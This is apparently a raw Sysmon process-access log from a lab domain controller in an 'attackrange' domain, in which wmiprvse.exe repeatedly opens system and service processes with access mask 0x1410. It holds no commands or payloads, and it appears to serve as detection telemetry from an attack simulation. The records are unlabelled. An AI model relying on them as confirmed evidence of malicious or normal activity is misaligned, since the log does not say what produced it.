15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 